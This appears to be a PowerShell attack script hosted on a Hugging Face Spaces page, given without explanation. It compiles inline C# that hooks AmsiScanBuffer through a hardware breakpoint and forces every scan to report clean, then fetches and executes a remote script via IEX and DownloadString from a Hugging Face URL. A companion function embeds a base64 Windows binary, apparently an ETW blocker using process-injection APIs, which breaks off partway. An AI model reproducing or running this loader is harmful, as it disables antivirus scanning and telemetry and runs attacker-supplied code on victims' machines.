Spaces:
Runtime error
Runtime error
| function Invoke | |
| { | |
| Invoke-ETW | |
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq.Expressions; | |
| using System.Linq; | |
| using System.Runtime.CompilerServices; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace Test | |
| { | |
| // CCOB IS THE GOAT | |
| public class Program | |
| { | |
| static string a = "msi"; | |
| static string b = "anB"; | |
| static string c = "ff"; | |
| static IntPtr BaseAddress = WinAPI.LoadLibrary("a" + a + ".dll"); | |
| static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, "A" + a + "Sc" + b + "u" + c + "er"); | |
| static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64))); | |
| public static void SetupBypass() | |
| { | |
| WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64(); | |
| ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL; | |
| MethodInfo method = typeof(Program).GetMethod("Handler", BindingFlags.Static | BindingFlags.Public); | |
| IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer()); | |
| // Saving our context to a struct | |
| Marshal.StructureToPtr(ctx, pCtx, true); | |
| bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx); | |
| ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64)); | |
| EnableBreakpoint(ctx, pABuF, 0); | |
| WinAPI.SetThreadContext((IntPtr)(-2), pCtx); | |
| } | |
| public static long Handler(IntPtr exceptions) | |
| { | |
| WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS(); | |
| ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS)); | |
| WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD(); | |
| ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD)); | |
| WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64(); | |
| ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64)); | |
| if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF) | |
| { | |
| ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp); | |
| // THE OUTPUT AMSIRESULT IS A POINTER, NOT THE EXPLICIT VALUE AAAAAAAAAA | |
| IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean | |
| //Console.WriteLine("Buffer: 0x{0:X}", (long)ContextRecord.R8); | |
| //Console.WriteLine("Scan Result: 0x{0:X}", Marshal.ReadInt32(ScanResult)); | |
| Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN); | |
| ContextRecord.Rip = ReturnAddress; | |
| ContextRecord.Rsp += 8; | |
| ContextRecord.Rax = 0; // S_OK | |
| Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT | |
| return WinAPI.EXCEPTION_CONTINUE_EXECUTION; | |
| } | |
| else | |
| { | |
| return WinAPI.EXCEPTION_CONTINUE_SEARCH; | |
| } | |
| } | |
| public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index) | |
| { | |
| switch (index) | |
| { | |
| case 0: | |
| ctx.Dr0 = (ulong)address.ToInt64(); | |
| break; | |
| case 1: | |
| ctx.Dr1 = (ulong)address.ToInt64(); | |
| break; | |
| case 2: | |
| ctx.Dr2 = (ulong)address.ToInt64(); | |
| break; | |
| case 3: | |
| ctx.Dr3 = (ulong)address.ToInt64(); | |
| break; | |
| } | |
| //Set bits 16-31 as 0, which sets | |
| //DR0-DR3 HBP's for execute HBP | |
| ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0); | |
| //Set DRx HBP as enabled for local mode | |
| ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1); | |
| ctx.Dr6 = 0; | |
| // Now copy the changed ctx into the original struct | |
| Marshal.StructureToPtr(ctx, pCtx, true); | |
| } | |
| public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue) | |
| { | |
| ulong mask = (1UL << bits) - 1UL; | |
| dw = (dw & ~(mask << lowBit)) | (newValue << lowBit); | |
| return dw; | |
| } | |
| } | |
| public class WinAPI | |
| { | |
| public const UInt32 DBG_CONTINUE = 0x00010002; | |
| public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001; | |
| public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1; | |
| public const Int32 EXCEPTION_CONTINUE_SEARCH = 0; | |
| public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3; | |
| public const Int32 CREATE_THREAD_DEBUG_EVENT = 2; | |
| public const Int32 EXCEPTION_DEBUG_EVENT = 1; | |
| public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5; | |
| public const Int32 EXIT_THREAD_DEBUG_EVENT = 4; | |
| public const Int32 LOAD_DLL_DEBUG_EVENT = 6; | |
| public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8; | |
| public const Int32 RIP_EVENT = 9; | |
| public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7; | |
| public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005; | |
| public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003; | |
| public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002; | |
| public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004; | |
| public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C; | |
| public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094; | |
| public const UInt32 DBG_CONTROL_C = 0x40010006; | |
| public const UInt32 DEBUG_PROCESS = 0x00000001; | |
| public const UInt32 CREATE_SUSPENDED = 0x00000004; | |
| public const UInt32 CREATE_NEW_CONSOLE = 0x00000010; | |
| public const Int32 AMSI_RESULT_CLEAN = 0; | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext); | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext); | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
| public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName); | |
| [DllImport("Kernel32.dll")] | |
| public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler); | |
| [Flags] | |
| public enum CONTEXT64_FLAGS : uint | |
| { | |
| CONTEXT64_AMD64 = 0x100000, | |
| CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01, | |
| CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02, | |
| CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04, | |
| CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08, | |
| CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10, | |
| CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT, | |
| CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS | |
| } | |
| [StructLayout(LayoutKind.Sequential)] | |
| public struct M128A | |
| { | |
| public ulong High; | |
| public long Low; | |
| public override string ToString() | |
| { | |
| return string.Format("High:{0}, Low:{1}", this.High, this.Low); | |
| } | |
| } | |
| /// <summary> | |
| /// x64 | |
| /// </summary> | |
| [StructLayout(LayoutKind.Sequential, Pack = 16)] | |
| public struct XSAVE_FORMAT64 | |
| { | |
| public ushort ControlWord; | |
| public ushort StatusWord; | |
| public byte TagWord; | |
| public byte Reserved1; | |
| public ushort ErrorOpcode; | |
| public uint ErrorOffset; | |
| public ushort ErrorSelector; | |
| public ushort Reserved2; | |
| public uint DataOffset; | |
| public ushort DataSelector; | |
| public ushort Reserved3; | |
| public uint MxCsr; | |
| public uint MxCsr_Mask; | |
| [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] | |
| public M128A[] FloatRegisters; | |
| [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] | |
| public M128A[] XmmRegisters; | |
| [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)] | |
| public byte[] Reserved4; | |
| } | |
| /// <summary> | |
| /// x64 | |
| /// </summary> | |
| [StructLayout(LayoutKind.Sequential, Pack = 16)] | |
| public struct CONTEXT64 | |
| { | |
| public ulong P1Home; | |
| public ulong P2Home; | |
| public ulong P3Home; | |
| public ulong P4Home; | |
| public ulong P5Home; | |
| public ulong P6Home; | |
| public CONTEXT64_FLAGS ContextFlags; | |
| public uint MxCsr; | |
| public ushort SegCs; | |
| public ushort SegDs; | |
| public ushort SegEs; | |
| public ushort SegFs; | |
| public ushort SegGs; | |
| public ushort SegSs; | |
| public uint EFlags; | |
| public ulong Dr0; | |
| public ulong Dr1; | |
| public ulong Dr2; | |
| public ulong Dr3; | |
| public ulong Dr6; | |
| public ulong Dr7; | |
| public ulong Rax; | |
| public ulong Rcx; | |
| public ulong Rdx; | |
| public ulong Rbx; | |
| public ulong Rsp; | |
| public ulong Rbp; | |
| public ulong Rsi; | |
| public ulong Rdi; | |
| public ulong R8; | |
| public ulong R9; | |
| public ulong R10; | |
| public ulong R11; | |
| public ulong R12; | |
| public ulong R13; | |
| public ulong R14; | |
| public ulong R15; | |
| public ulong Rip; | |
| public XSAVE_FORMAT64 DUMMYUNIONNAME; | |
| [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)] | |
| public M128A[] VectorRegister; | |
| public ulong VectorControl; | |
| public ulong DebugControl; | |
| public ulong LastBranchToRip; | |
| public ulong LastBranchFromRip; | |
| public ulong LastExceptionToRip; | |
| public ulong LastExceptionFromRip; | |
| } | |
| [StructLayout(LayoutKind.Sequential)] | |
| public struct EXCEPTION_RECORD | |
| { | |
| public uint ExceptionCode; | |
| public uint ExceptionFlags; | |
| public IntPtr ExceptionRecord; | |
| public IntPtr ExceptionAddress; | |
| public uint NumberParameters; | |
| [MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation; | |
| } | |
| [StructLayout(LayoutKind.Sequential)] | |
| public struct EXCEPTION_POINTERS | |
| { | |
| public IntPtr pExceptionRecord; | |
| public IntPtr pContextRecord; | |
| } | |
| } | |
| } | |
| "@ | |
| [Test.Program]::SetupBypass() | |
| IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/remen') | |
| } | |
| function Invoke-ETW | |
| { | |
| $base64binary="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAItqxqAAAAAAAAAAAOAAIgALATAAACQAAAAIAAAAAAAAEkIAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAL9BAABPAAAAAGAAAKwFAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAUQQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAGCIAAAAgAAAAJAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKwFAAAAYAAAAAYAAAAmAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADzQQAAAAAAAEgAAAACAAUA7CAAACggAAADAAIAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwBQBnAAAAAQAAESgQAAAKbxEAAAoKF40WAAABJRYgwwAAAJwLcgEAAHAoGAAABnIVAABwKBcAAAYMBggHjmlqKBIAAAofQBIDKBQAAAYmBggHB45pEgQoEwAABiYGCAeOaWooEgAACgkSBSgUAAAGJioeAigTAAAKKh4CKBMAAAoqHgIoEwAACioeAigTAAAKKh4CKBMAAAoqAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAACwNAAAjfgAAmA0AAFgPAAAjU3RyaW5ncwAAAADwHAAANAAAACNVUwAkHQAAEAAAACNHVUlEAAAANB0AAPQCAAAjQmxvYgAAAAAAAAACAAABVz0CFAkCAAAA+gEzABYAAAEAAAAXAAAAEwAAAFcAAAApAAAAnAAAABMAAAAeAAAAEgAAAAUAAAABAAAAAwAAACMAAAABAAAAAgAAABAAAAAAACgHAQAAAAAABgBtBucKBgDaBucKBgCCBagKDwAHCwAABgCqBcMJBgBBBsMJBgAiBsMJBgDBBsMJBgCNBsMJBgCmBsMJBgDBBcMJBgCWBcgKBgB0BcgKBgAFBsMJBgDcBZ0HBgBTDcUIBgAeCm0OBgAiBcUIBgBeBsUIBgDMCMUICgCiDKgKBgD4BsUIBgB7CsUIAAAAAFgAAAAAAAEAAQABABAAeAiODkEAAQABAAAAEAAgAHwDQQABAAMABQAQAA4AAABBAAEABAAFABAAvwgAAEEAAQAaAA0BEABXAQAASQABACkADQERAGsBAABJAAUAKQANAREA6QEAAEkAFwApAA0BEACcAQAASQAZACkADQEQAD0BAABJABwAKQANABAAJAEAAEEAIgApAA0BEAAJAQAASQAoACoADQEQABgBAABJACsAKgANARAAigEAAEkALgAqAA0BEABzAAAASQA0ACoABQEAAH8LAABRADYAKgAFAQAAsAEAAFEARAAqAAUBAACfCwAAUQBIACoABQEAAIANAABRAEsAKgADAGcMigADABIDigADAIQCjQADAFwCjQADAFACjQADAEMDkAADABQKkAADAE0EkAADAPcBjQADAC8CjQADADUHjQADAD0HjQADALoLjQADAMgLjQADAPUFjQADAJILjQADAHkOkwADACYAkwADADIAigADAFgOigADAGIOigADAFYKigADAAgKlgADAEgOigADAGkIjQADAGYKigADEDEEmgADADMNigADANAMigADAIQIigADAEoPigADAHQCnQADAGcCigADADMNoAADAN8MigADAJoCowADAIQInQADAE4PjQADAEoPjQADAGoIpwADABgIpwADADwKigADAGoIpwADABgIpwADADwKigADAGoIjQADADwPigADAMYEigADAGQLoAADAGgKigADAE4DigADAFkMigADAAUDigAGBjMCoABWgKQIqgBWgD0FqgBWgPgCqgBWgHQJqgBWgMECqgBWgEcFqgBWgLwDqgBWgEsMqgBWgEcCqgBWgFQJqgBWgGMJqgBWgP8IqgBWgJEHqgAGBjMCoABWgO8ErgBWgOEBrgBWgMMArgAGBjMCoABWgIgAsgBWgMsBsgAGBjMCoABWgL4AtgBWgPwAtgBWgGEAtgBWgOUAtgBWgBgCtgBWgL0BtgBWgPsBtgBWgNYAtgBWgAkCtgBWgH0AtgBWgJ8AtgBWgKwAtgBQIAAAAACWAOgIugABAMMgAAAAAIYYYAoGAAIAyyAAAAAAhhhgCgYAAgAAAAAAgACTIAwFwAACAAAAAACAAJMgFwnMAAYAAAAAAIAAkyAmDtUACQAAAAAAgACTIFoF3gANAAAAAACAAJMgcgzpABQAAAAAAIAAkyC8A/EAFwAAAAAAgACTIEsM/QAfAAAAAACAAJMgdwETASoAAAAAAIAAkyD+BBcBKgAAAAAAgACTID4NIgEwAAAAAACAAJMgCA4oATIAAAAAAIAAkyCwAygBMwAAAAAAgACTIPYOLQE0AAAAAACAAJMgBA8zATYAAAAAAIAAkyCcDj0BOwAAAAAAgACTIBYPRgFAAAAAAACAAJMg2Q5RAUUAAAAAAIAAkyB6BFsBSgAAAAAAgACTIOsCZQFOAAAAAACAAJYgqgxqAU8AAAAAAIAAliDqDnABUQDTIAAAAACGGGAKBgBSAAAAAACAAJMgfgx1AVIAAAAAAIAAkyC8DoABVwAAAAAAgACTIHAMkAFiAAAAAACAAJMgiwmdAWYAAAAAAIAAkyCbCaoBbQAAAAAAgACTIMQHuwF3AAAAAACAAJMgzAPDAXkAAAAAAIAAkyDZB84BfQAAAAAAgACTILkM2QGAAAAAAACAAJMgqw7kAYQAAAAAAIAAkyDTAvQBjwAAAAAAgACTIOQC/QGUAAAAAACAAJMgGgMEApYAAAAAAIAAliCuCQ4CmwDbIAAAAACGGGAKBgCdAOMgAAAAAIYYYAoGAJ0AAAABAJoLAgABAPQEAgACABcFAAADADkLAAAEAFMHAAABAFINAAACAH0IAAADAJILAAABAEgOAAACAO4NAAADAJILAAAEAFkHAAABAEgOAAACAJILAAADAO4GAAAEAP0GAAAFAEUHAAAGAAUHAAAHAEwHAAABAD0MAAACADEEAAADAJACACAAAAAAAAABAOoDAAACAKIDAAADAP8DAAAEACIEAAAFAB8MACAGADEEAAAHALALACAAAAAAAAABALQEAAACANYEAAADAEoLAAAEACYLAAAFABYLAAAGAG8LAAAHAMsNAAAIACkPAQAJAAYKAgAKACwJAAABAEAEAAACAEMKAAADAGAHAAAEALcCAAAFAJkIAAAGAGcDAAABAEAEAAACALsKAAABAEgOAAABAFINAAABAC0KAAACAHEIAAABAGcMAAACAO4MAAADACwKAAAEAHkHAAAFAKMCAAABAGcMAAACAAwNAAADAHkHAAAEACwFAAAFAHYNAAABAGcMAAACAO4MAAADACwKAAAEAFMHAgAFANEIAAABAGcMAAACAAwNAAADAHkHAAAEAJINAgAFAGcNAQABAGcMAQACAJILAgADAJQEAAAEAHcHAAABABIDAAABAGEEAAACAGkEAAABANEEAAABABQEAAACAAcMAAADAEEJAAAEAD4IAAAFAGQIAAABANYLAAACAJ4EAAADABAIAAAEACsPAAAFANgEAAAGAM0NAAAHAFUEAAAIAPoJAAAJAPAJAAAKADsCAAALAJQLAAABAAYEAAACACEMAAADAF4LAAAEAJoCAAABANUJAAACAC8MAAADAOkLAAAEAIkHAAAFAP8NAAAGAIMKAAAHAEcEAAABANwDAAACAAYEAAADAPAMAAAEACoNAAAFAGwHAAAGAJ8NAAAHAIAHAAAIAN0JAAAJAC4FAAAKAFoNAAABAP4HACACALcHAAABABAIAAACAJUKAAADAKwEAAAEANIDAAABAP4HAAACALcHAAADAPYHAAABAGEEAAACAHIEAAADAJEIAAAEAPwMAAABABIDAAACACEMAAADAF4LAAAEAAYEAAAFABYNAAAGAEoKAAAHADMDAAAIACUNAAAJALkNAAAKABUHAAALADUKAAABAJUDAAACAOQEAAADAAEAAAAEAD4AAAAFAEsAAAABAJUDAAACANkNAAABAJUDAAACAPALAAADAO0IAAAEACYIAAAFAFcIAAABAAYEAAACAPAMCQBgCgEAEQBgCgYAGQBgCgoAKQBgChAAMQBgChAAOQBgChAAQQBgChAASQBgChAAUQBgChAAWQBgChAAYQBgChUAaQBgChAAcQBgChAAeQBgChAAmQBgCgYAqQCYDCQAqQCKAykAuQCtDS0AgQBgCgYACQDcADsACQDgAEAACQDkAEUACQDoAEoACQDsAE8ACQDwAFQACQD0AFkACQD4AF4ACQD8AGMACQAAAWgACQAEAW0ACQAIAXIACQAMAXcACQAUAXwACQAYAUAACQAcAUUACQAkAUAACQAoAUUACQAwAXwACQA0AU8ACQA4AVQACQA8AVkACQBAAV4ACQBEAUAACQBIAUUACQBMAYEACQBQAUoACQBUAWMACQBYAWgACQBcAW0ALgALABQCLgATAB0CLgAbADwCLgAjAEUCLgArAFMCLgAzAFMCLgA7AFMCLgBDAEUCLgBLAFkCLgBTAFMCLgBbAFMCLgBjAHECLgBrAJsCLgBzAKgCAwJ7AEAAIwJ7AEAAQwJ7AEAAYwJ7AEAALwCGADYAhgA7AIYAPwCGAPEAiAAaAKgIFwC1CAABCQAMBQEAQAELABcJAQBAAQ0AJg4BAEABDwBaBQEAQAERAHIMAQBAARMAvAMBAAABFQBLDAEARgEXAHcBAQBAARkA/gQBAEABGwA+DQEAQAEdAAgOAQBAAR8AsAMBAAABIQD2DgEAAAEjAAQPAQAAASUAnA4BAEABJwAWDwEAAAEpANkOAQBAASsAegQBAAABLQDrAgEAAAEvAKoMAgAAATEA6g4CAAABNQB+DAMAAAE3ALwOAwAAATkAcAwDAAABOwCLCQMAAAE9AJsJAwAAAT8AxAcDAAABQQDMAwMAAAFDANkHAwAAAUUAuQwDAAABRwCrDgMAAAFJANMCAwAAAUsA5AIDAAABTQAaAwMAAAFPAK4JAwAEgAAAAQAAAAAAAAAAAAAAAACFDgAABAAAAAAAAAAAAAAAMgBTAgAAAAAEAAAAAAAAAAAAAAAyAMUIAAAAAAQAAwAFAAMABgADAAcAAwAIAAMACQADAAoAAwALAAMADAADAA0AAwAOAAMADwADABAAAwARAAMAEgADABMAAwAAAABBcGNBcmd1bWVudDEAS2VybmVsMzIAa2VybmVsMzIAV2luMzIAY2JSZXNlcnZlZDIAbHBSZXNlcnZlZDIAQXBjQXJndW1lbnQyAEFwY0FyZ3VtZW50MwA8TW9kdWxlPgBQQUdFX0VYRUNVVEVfUkVBRABDTElFTlRfSUQAUEFHRV9HVUFSRABEVVBMSUNBVEVfQ0xPU0VfU09VUkNFAFBBR0VfTk9DQUNIRQBQQUdFX1dSSVRFQ09NQklORQBOT05FAFBST1RFQ1RfRlJPTV9DTE9TRQBQQUdFX1JFQURXUklURQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBBR0VfRVhFQ1VURQBVTklDT0RFX1NUUklORwBBTlNJX1NUUklORwBUSFJFQURfQkFTSUNfSU5GT1JNQVRJT04AUFJPQ0VTU19CQVNJQ19JTkZPUk1BVElPTgBQUk9DRVNTX0lORk9STUFUSU9OAFNUQVJUVVBJTkZPAEdldENvbnNvbGVPdXRwdXRDUABPQkpFQ1RfQVRUUklCVVRFUwBTRUNVUklUWV9BVFRSSUJVVEVTAEhBTkRMRV9GTEFHUwBQQUdFX05PQUNDRVNTAERVUExJQ0FURV9TQU1FX0FDQ0VTUwBJTkhFUklUAFNUQVJUVVBJTkZPRVgAZHdYAFBBR0VfUkVBRE9OTFkAUEFHRV9XUklURUNPUFkAUEFHRV9FWEVDVVRFX1dSSVRFQ09QWQBkd1kAdmFsdWVfXwBSdW50aW1lRGF0YQBTZXRRdW90YQBjYgBtc2NvcmxpYgBkd1RocmVhZElkAEluaGVyaXRlZEZyb21VbmlxdWVQcm9jZXNzSWQAZHdQcm9jZXNzSWQAcHJvY2Vzc0lkAENsaWVudElkAGxwTnVtYmVyT2ZCeXRlc1JlYWQAYnl0ZXNSZWFkAFZpcnR1YWxNZW1vcnlSZWFkAE50UXVldWVBcGNUaHJlYWQATnRBbGVydFJlc3VtZVRocmVhZABDcmVhdGVUaHJlYWQAVW5pcXVlVGhyZWFkAGhUaHJlYWQATnRRdWVyeUluZm9ybWF0aW9uVGhyZWFkAENyZWF0ZVN1c3BlbmRlZABscFJlc2VydmVkAFNlY3VyaXR5UXVhbGl0eU9mU2VydmljZQBCeXRlc0xlZnRUaGlzTWVzc2FnZQBBZ2VudC5QSW52b2tlAGdldF9IYW5kbGUAVGhyZWFkSGFuZGxlAGhTb3VyY2VIYW5kbGUAQ2xvc2VIYW5kbGUARHVwbGljYXRlSGFuZGxlAExkckdldERsbEhhbmRsZQBTZWN0aW9uSGFuZGxlAGhTb3VyY2VQcm9jZXNzSGFuZGxlAGhUYXJnZXRQcm9jZXNzSGFuZGxlAHByb2Nlc3NIYW5kbGUAbHBUYXJnZXRIYW5kbGUAYkluaGVyaXRIYW5kbGUAaGFuZGxlAGhGaWxlAGxwVGl0bGUAV2luZG93VGl0bGUAaE1vZHVsZQBwcm9jTmFtZQBNb2ROYW1lAFF1ZXJ5RnVsbFByb2Nlc3NJbWFnZU5hbWUAbHBFeGVOYW1lAEltYWdlUGF0aE5hbWUARGxsTmFtZQBscEFwcGxpY2F0aW9uTmFtZQBPYmplY3ROYW1lAG5hbWUAbHBDb21tYW5kTGluZQBBcGNSb3V0aW5lAE5vbmUAaFJlYWRQaXBlAFBlZWtOYW1lZFBpcGUAQ3JlYXRlUGlwZQBoV3JpdGVQaXBlAFZhbHVlVHlwZQBmbEFsbG9jYXRpb25UeXBlAFRlcm1pbmF0ZQBWaXJ0dWFsTWVtb3J5V3JpdGUAVXBkYXRlUHJvY1RocmVhZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBkd0ZpbGxBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBscFZhbHVlAGxwUHJldmlvdXNWYWx1ZQBTaXplT2ZTdGFja1Jlc2VydmUAYmxvY2tldHcuZXhlAGR3WFNpemUAZHdZU2l6ZQBjYlNpemUAbHBSZXR1cm5TaXplAGxwU2l6ZQBuQnVmZmVyU2l6ZQBDb21taXRTaXplAGxwZHdTaXplAFZpZXdTaXplAE1heFNpemUAU3luY2hyb25pemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTb3VyY2VTdHJpbmcAUnRsSW5pdFVuaWNvZGVTdHJpbmcAUnRsVW5pY29kZVN0cmluZ1RvQW5zaVN0cmluZwBBbGxvY2F0ZURlc3RpbmF0aW9uU3RyaW5nAERsbFBhdGgATWF4aW11bUxlbmd0aABUaHJlYWRJbmZvcm1hdGlvbkxlbmd0aABwcm9jZXNzSW5mb3JtYXRpb25MZW5ndGgAUmV0dXJuTGVuZ3RoAHJldHVybkxlbmd0aABsZW5ndGgAaG9vawBkd01hc2sAQWZmaW5pdHlNYXNrAE9yZGluYWwAYnl0ZXNBdmFpbABBbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABOdGRsbABTeXN0ZW0ARW51bQBscE51bWJlck9mQnl0ZXNXcml0dGVuAE1haW4AVGhyZWFkSW5mb3JtYXRpb24AUXVlcnlMaW1pdGVkSW5mb3JtYXRpb24AU2V0SGFuZGxlSW5mb3JtYXRpb24AbHBQcm9jZXNzSW5mb3JtYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFNldEluZm9ybWF0aW9uAFF1ZXJ5SW5mb3JtYXRpb24AVmlydHVhbE1lbW9yeU9wZXJhdGlvbgBOdENyZWF0ZVNlY3Rpb24ATnRNYXBWaWV3T2ZTZWN0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAHNlY3Rpb24ASW5oZXJpdERpc3Bvc2l0aW9uAFNoZWxsSW5mbwBEZXNrdG9wSW5mbwBscFN0YXJ0dXBJbmZvAGxwRGVza3RvcABTdHJpbmdCdWlsZGVyAGxwQnVmZmVyAGxwQnl0ZXNCdWZmZXIAYnVmZmVyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgBscFNlY3VyaXR5RGVzY3JpcHRvcgBVSW50UHRyAGFsbG9jYXRpb25BdHRyaWJzAERsbENoYXJhY3RlcmlzdGljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAbWlsbGlzZWNvbmRzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQaXBlQXR0cmlidXRlcwBscFByb2Nlc3NBdHRyaWJ1dGVzAE9iamVjdEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAFByb2Nlc3NBY2Nlc3NGbGFncwBkd0ZsYWdzAGFyZ3MARHVwbGljYXRlT3B0aW9ucwBkd09wdGlvbnMAZHdYQ291bnRDaGFycwBkd1lDb3VudENoYXJzAHBQcm9jZXNzUGFyYW1ldGVycwBwQXR0cnMAVGhyZWFkSW5mb3JtYXRpb25DbGFzcwBwcm9jZXNzSW5mb3JtYXRpb25DbGFzcwBkd0Rlc2lyZWRBY2Nlc3MAZGVzaXJlZEFjY2VzcwBwcm9jZXNzQWNjZXNzAENyZWF0ZVByb2Nlc3MAVW5pcXVlUHJvY2VzcwBoUHJvY2VzcwBOdE9wZW5Qcm